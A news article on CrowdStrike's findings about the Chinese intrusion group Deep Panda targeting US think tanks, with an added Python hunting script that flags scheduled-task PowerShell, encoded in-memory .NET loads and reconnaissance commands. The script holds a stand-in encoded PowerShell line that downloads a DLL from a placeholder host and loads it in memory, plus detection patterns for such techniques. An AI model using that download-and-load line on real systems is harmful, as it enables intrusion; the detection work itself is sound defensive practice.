The Chinese cyberattack group Deep Panda has compromised national security think tanks using sophisticated techniques designed to steal confidential data concerning US foreign policy, according to security researchers at CrowdStrike. The CrowdStrike team say that "several" national security think tanks working in the defense, finance, legal and government arenas have been compromised by the group, which the researchers call "one of the most advanced Chinese nation-state cyber intrusion groups." The hackers have been launching attacks for almost three years, but it is only recently that Deep Panda's focus has changed.
CrowdStrike says that attacks are now taking place against think tanks and individuals working on security and governmental policy for Iraq and the Middle East, a shift away from collecting data on Southeast Asia. While the researchers declined to name the specific think tanks or the data that was stolen, they did say that email accounts, directories and files were compromised.
The team say:
“This is undoubtedly related to the recent Islamic State of Iraq and the Levant (ISIS) takeover of major parts of Iraq and the potential disruption for major Chinese oil interests in that country. In fact, Iraq happens to be the fifth-largest source of crude oil imports for China and the country is the largest foreign investor in Iraq’s oil sector. Thus, it wouldn’t be surprising if the Chinese government is highly interested in getting a better sense of the possibility of deeper U.S. military involvement that could help protect the Chinese oil infrastructure in Iraq.
In fact, the shift in targeting of Iraq policy individuals occurred on June 18, the day that ISIS began its attack on the Baiji oil refinery.”
Deep Panda's intrusions (detailed in CrowdStrike's PDF report) involve exploiting vulnerabilities in Windows systems to deploy PowerShell scripts as scheduled tasks. The scripts are passed to the PowerShell interpreter on the command line rather than written to disk, which avoids leaving extraneous files on the victim's machine and helps the activity evade detection. The tasks were scheduled to call back to Deep Panda's command-and-control (C&C) infrastructure every two hours.
Once executed, a .NET executable is run directly from memory, which in turn downloads and runs the MadHatter .NET Remote Access Tool (RAT), a favored tool of Deep Panda. Web shell implants are also used to ensure low-footprint persistent access to the victim network, keeping the intrusion as quiet as possible, while the C&C channel is used to run reconnaissance commands such as "tasklist," "net view," and "net localgroup administrators," to steal credentials and to access data on the network.
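The tradecraft described above leaves almost nothing on disk, so the practical detection surface is process-creation telemetry: PowerShell spawned by a scheduled-task host, an encoded command line that decodes to an in-memory .NET load, and a short burst of reconnaissance commands run as children of that PowerShell process. The hunt below is an added example and not CrowdStrike's or Deep Panda's code; the log records are constructed in the same shape as process-creation events (time, host, parent image, image, command line), and the encoded payload is a hypothetical stand-in for a memory-resident loader, not a real sample.

```python
import base64
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Hypothetical encoded payload: a stand-in for an in-memory .NET loader, built
# here only so the decoder below has something realistic to work on.
PAYLOAD = ("$c=New-Object Net.WebClient;"
           "$a=[Reflection.Assembly]::Load($c.DownloadData('http://c2.example/x.dll'))")
ENC = base64.b64encode(PAYLOAD.encode("utf-16le")).decode()

# Constructed process-creation records (not real telemetry):
# time|host|parent_image|image|command_line
SAMPLE_LOG = """\
2014-06-18T09:00:00|TT-WS01|C:\\Windows\\System32\\taskeng.exe|C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe|powershell.exe -NoP -W Hidden -Enc {enc}
2014-06-18T09:00:05|TT-WS01|C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe|C:\\Windows\\System32\\tasklist.exe|tasklist
2014-06-18T09:00:09|TT-WS01|C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe|C:\\Windows\\System32\\net.exe|net view
2014-06-18T09:00:12|TT-WS01|C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe|C:\\Windows\\System32\\net.exe|net localgroup administrators
2014-06-18T10:15:00|TT-WS02|C:\\Windows\\explorer.exe|C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe|powershell.exe -File C:\\Scripts\\backup.ps1
""".format(enc=ENC)

# PowerShell accepts any unambiguous prefix of -EncodedCommand; -e/-ec/-enc are the common ones.
ENCODED_RE = re.compile(r"(?i)(?:^|\s)-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})")
IN_MEMORY_PATTERNS = ("reflection.assembly", "downloaddata", "downloadstring", "invoke-expression", "iex ")
RECON_COMMANDS = ("tasklist", "net view", "net localgroup administrators")
TASK_HOSTS = ("taskeng.exe", "svchost.exe", "schtasks.exe")  # processes that launch scheduled tasks
RECON_WINDOW = timedelta(minutes=10)


def decode_encoded_command(command_line):
    """Return the script hidden in a -EncodedCommand argument, or None if absent/invalid."""
    m = ENCODED_RE.search(command_line)
    if not m:
        return None
    try:
        # PowerShell encodes the script as UTF-16LE before base64.
        return base64.b64decode(m.group(1)).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None


def parse_log(text):
    """Split pipe-delimited records into dicts; image names are reduced to lower-case basenames."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, host, parent, image, cmd = line.split("|", 4)
        events.append({
            "time": datetime.fromisoformat(ts),
            "host": host,
            "parent": parent.rsplit("\\", 1)[-1].lower(),
            "image": image.rsplit("\\", 1)[-1].lower(),
            "cmd": cmd,
        })
    return events


def hunt(text):
    """Return (host, rule, detail) findings for the three behaviours described in the article."""
    findings = []
    recon_seen = defaultdict(dict)  # host -> {recon command: time first seen}
    for ev in parse_log(text):
        if ev["image"] == "powershell.exe":
            # Rule 1: PowerShell started by a scheduled-task host process.
            if ev["parent"] in TASK_HOSTS:
                findings.append((ev["host"], "powershell-from-scheduled-task", ev["cmd"]))
            # Rule 2: encoded command that decodes to a download-and-load-from-memory pattern.
            decoded = decode_encoded_command(ev["cmd"])
            if decoded and any(p in decoded.lower() for p in IN_MEMORY_PATTERNS):
                findings.append((ev["host"], "in-memory-dotnet-load", decoded))
        # Rule 3: collect reconnaissance commands whose parent is PowerShell.
        if ev["parent"] == "powershell.exe":
            for rc in RECON_COMMANDS:
                if ev["cmd"].lower().startswith(rc):
                    recon_seen[ev["host"]].setdefault(rc, ev["time"])
    for host, seen in recon_seen.items():
        if len(seen) == len(RECON_COMMANDS):
            span = max(seen.values()) - min(seen.values())
            if span <= RECON_WINDOW:
                findings.append((host, "recon-chain-from-powershell",
                                 f"{len(seen)} commands in {int(span.total_seconds())}s"))
    return findings


if __name__ == "__main__":
    for host, rule, detail in hunt(SAMPLE_LOG):
        print(f"{host:8} {rule:32} {detail}")
```

On the sample data the workstation TT-WS01 trips all three rules while the scheduled backup script on TT-WS02 trips none; in practice the decoded-command rule is the one worth tuning, because legitimate management tooling also uses -EncodedCommand, whereas the combination of a task-host parent, a reflective load and the recon triad within minutes is rarely benign.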
CrowdStrike detected the intrusions through its Falcon Host software, an endpoint security agent that combines endpoint telemetry with threat intelligence. The software is offered on a pro-bono basis to think tanks and non-profits, organizations that are unlikely to have the funding to protect themselves otherwise.
“Deep Panda presents a very serious threat not just to think tanks, but also multinational financial institutions, law firms, defense contractors, and government agencies,” the security researchers say. “Due to their stellar operational security and reliance on anti-forensic and anti-IOC detection techniques, detecting and stopping them is very challenging without the use of next-generation endpoint technology like Falcon Host.”
In June, CrowdStrike said that Putter Panda, a cyber espionage group connected to the Chinese military, had been targeting US and European government partners in order to steal corporate trade secrets relating to the satellite, aerospace and communications industries.